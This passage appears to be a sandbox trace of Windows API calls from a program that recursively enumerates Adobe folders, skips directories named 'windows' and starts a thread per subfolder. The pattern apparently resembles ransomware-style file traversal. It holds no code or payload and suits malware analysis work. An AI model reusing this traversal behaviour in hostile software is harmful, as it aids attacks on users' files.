lpString2="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\*.*") returned="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\*.*" [0042.337] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\*.*") returned 41 [0042.337] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\", lpString2="Replicate" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate") returned="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate" [0042.337] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\*.*") returned="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\*.*" [0042.337] GlobalMemoryStatus (in: lpBuffer=0x1495fd10 | out: lpBuffer=0x1495fd10) [0042.337] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x109106c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5d0 [0042.348] CloseHandle (hObject=0x5d0) returned 1 [0042.348] FindNextFileW (in: hFindFile=0x5db5b8, lpFindFileData=0x1495fd30 | out: lpFindFileData=0x1495fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Replicate", cAlternateFileName="REPLIC~1")) returned 0 [0042.348] FindClose (in: hFindFile=0x5db5b8 | out: hFindFile=0x5db5b8) returned 1 Thread: id = 294 os_tid = 0x78c [0042.346] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\*.*", lpFindFileData=0xb2cfd30 | out: lpFindFileData=0xb2cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf1a9e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7cf1a9e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7cf1a9e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db678 [0042.346] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.346] FindNextFileW (in: hFindFile=0x5db678, lpFindFileData=0xb2cfd30 | out: lpFindFileData=0xb2cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf1a9e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7cf1a9e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7cf1a9e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.346] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.346] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.346] FindNextFileW (in: hFindFile=0x5db678, lpFindFileData=0xb2cfd30 | out: lpFindFileData=0xb2cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf1a9e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f24da0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f24da0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActiveX", cAlternateFileName="")) returned 1 [0042.346] lstrcmpW (lpString1=".", lpString2="ActiveX") returned -1 [0042.347] lstrcmpW (lpString1="..", lpString2="ActiveX") returned -1 [0042.347] lstrcmpiW (lpString1="windows", lpString2="ActiveX") returned 1 [0042.347] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\*.*" [0042.347] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\*.*") returned 57 [0042.347] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\", lpString2="ActiveX" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX" [0042.347] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0042.347] GlobalMemoryStatus (in: lpBuffer=0xb2cfd10 | out: lpBuffer=0xb2cfd10) [0042.347] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10928730, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5dc [0042.355] CloseHandle (hObject=0x5dc) returned 1 [0042.355] FindNextFileW (in: hFindFile=0x5db678, lpFindFileData=0xb2cfd30 | out: lpFindFileData=0xb2cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf1a9e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f24da0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f24da0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActiveX", cAlternateFileName="")) returned 0 [0042.355] FindClose (in: hFindFile=0x5db678 | out: hFindFile=0x5db678) returned 1 Thread: id = 295 os_tid = 0x64 [0042.351] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\*.*", lpFindFileData=0x14a9fd30 | out: lpFindFileData=0x14a9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8386f760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8386f760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8386f760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db5b8 [0042.354] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.354] FindNextFileW (in: hFindFile=0x5db5b8, lpFindFileData=0x14a9fd30 | out: lpFindFileData=0x14a9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8386f760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8386f760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8386f760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.354] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.354] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.354] FindNextFileW (in: hFindFile=0x5db5b8, lpFindFileData=0x14a9fd30 | out: lpFindFileData=0x14a9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8386f760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8386f760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8386f760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0", cAlternateFileName="")) returned 1 [0042.354] lstrcmpW (lpString1=".", lpString2="1.0") returned -1 [0042.354] lstrcmpW (lpString1="..", lpString2="1.0") returned -1 [0042.354] lstrcmpiW (lpString1="windows", lpString2="1.0") returned 1 [0042.354] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\*.*" [0042.354] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\*.*") returned 53 [0042.354] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\", lpString2="1.0" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0" [0042.355] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*" [0042.355] GlobalMemoryStatus (in: lpBuffer=0x14a9fd10 | out: lpBuffer=0x14a9fd10) [0042.355] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10b8e3e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5d0 [0042.368] CloseHandle (hObject=0x5d0) returned 1 [0042.368] FindNextFileW (in: hFindFile=0x5db5b8, lpFindFileData=0x14a9fd30 | out: lpFindFileData=0x14a9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8386f760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8386f760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8386f760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0", cAlternateFileName="")) returned 0 [0042.368] FindClose (in: hFindFile=0x5db5b8 | out: hFindFile=0x5db5b8) returned 1 Thread: id = 296 os_tid = 0x9e0 [0042.367] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*", lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671070 [0042.422] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.422] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.422] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.422] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.422] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca_ES", cAlternateFileName="")) returned 1 [0042.422] lstrcmpW (lpString1=".", lpString2="ca_ES") returned -1 [0042.422] lstrcmpW (lpString1="..", lpString2="ca_ES") returned -1 [0042.422] lstrcmpiW (lpString1="windows", lpString2="ca_ES") returned 1 [0042.423] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0042.423] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0042.423] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="ca_ES" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES" [0042.423] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\*.*" [0042.423] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0042.423] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10940798, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x624 [0045.674] CloseHandle (hObject=0x624) returned 1 [0045.674] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs_CZ", cAlternateFileName="")) returned 1 [0045.674] lstrcmpW (lpString1=".", lpString2="cs_CZ") returned -1 [0045.674] lstrcmpW (lpString1="..", lpString2="cs_CZ") returned -1 [0045.675] lstrcmpiW (lpString1="windows", lpString2="cs_CZ") returned 1 [0048.883] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0048.884] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0048.884] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="cs_CZ" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ" [0048.884] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\*.*" [0048.884] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0048.884] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93e83f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0048.898] CloseHandle (hObject=0x260) returned 1 [0048.898] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d580500, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da_DK", cAlternateFileName="")) returned 1 [0048.898] lstrcmpW (lpString1=".", lpString2="da_DK") returned -1 [0048.898] lstrcmpW (lpString1="..", lpString2="da_DK") returned -1 [0048.898] lstrcmpiW (lpString1="windows", lpString2="da_DK") returned 1 [0048.898] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0048.898] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0048.898] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="da_DK" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK" [0048.898] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\*.*" [0048.898] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0048.898] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9a4af98, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0048.902] CloseHandle (hObject=0x260) returned 1 [0048.902] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de_DE", cAlternateFileName="")) returned 1 [0048.902] lstrcmpW (lpString1=".", lpString2="de_DE") returned -1 [0048.902] lstrcmpW (lpString1="..", lpString2="de_DE") returned -1 [0048.902] lstrcmpiW (lpString1="windows", lpString2="de_DE") returned 1 [0048.904] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0048.904] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0048.905] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="de_DE" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE" [0048.905] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\*.*" [0048.905] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0048.905] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24bd6298, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0048.911] CloseHandle (hObject=0x260) returned 1 [0048.911] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5a6660, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en_US", cAlternateFileName="")) returned 1 [0048.911] lstrcmpW (lpString1=".", lpString2="en_US") returned -1 [0048.911] lstrcmpW (lpString1="..", lpString2="en_US") returned -1 [0048.911] lstrcmpiW (lpString1="windows", lpString2="en_US") returned 1 [0048.914] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0048.914] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0048.914] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="en_US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US" [0048.914] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\*.*" [0048.914] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0048.914] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24c06368, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0048.922] CloseHandle (hObject=0x260) returned 1 [0048.922] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es_ES", cAlternateFileName="")) returned 1 [0048.922] lstrcmpW (lpString1=".", lpString2="es_ES") returned -1 [0048.922] lstrcmpW (lpString1="..", lpString2="es_ES") returned -1 [0048.922] lstrcmpiW (lpString1="windows", lpString2="es_ES") returned 1 [0048.924] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0048.924] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0048.925] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="es_ES" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES" [0048.925] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\*.*" [0048.925] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0048.925] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24c36438, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0048.936] CloseHandle (hObject=0x260) returned 1 [0048.937] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eu_ES", cAlternateFileName="")) returned 1 [0048.937] lstrcmpW (lpString1=".", lpString2="eu_ES") returned -1 [0048.937] lstrcmpW (lpString1="..", lpString2="eu_ES") returned -1 [0048.937] lstrcmpiW (lpString1="windows", lpString2="eu_ES") returned 1 [0048.939] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0048.939] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0048.939] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="eu_ES" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES" [0048.939] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\*.*") 